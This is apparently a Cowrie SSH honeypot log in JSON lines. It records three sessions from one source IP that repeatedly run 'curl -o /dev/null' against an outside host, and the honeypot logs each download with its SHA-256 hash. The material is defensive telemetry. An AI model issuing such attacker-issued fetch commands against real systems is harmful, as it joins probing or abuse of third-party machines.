{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.750727Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.751172Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.756799Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.758082Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.762504Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.763030Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.800591Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.802267Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.803196Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.804204Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.808042Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.810634Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.812299Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.812772Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.816913Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.841636Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.842423Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.873458Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.876822Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.878602Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.879445Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.881642Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.882478Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.891081Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.891774Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.922581Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.923320Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.928093Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.928757Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.932211Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.933113Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.938253Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.941327Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.944892Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.971668Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.973700Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.976430Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.979131Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.980226Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.980897Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.984224Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.985070Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:45.986748Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:45.987689Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.020327Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.022520Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.025614Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.027626Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.028336Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.032018Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.032762Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.041738Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.042316Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.066609Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.068669Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.069793Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.070540Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.074042Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.077118Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.077792Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.084376Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.085668Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.086333Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.115039Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.115708Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.120810Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.123807Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.126469Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.129061Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.129461Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.131157Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.131558Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.161820Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.164310Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.166004Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.166967Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.172673Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.173662Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:46.175505Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:46.176290Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
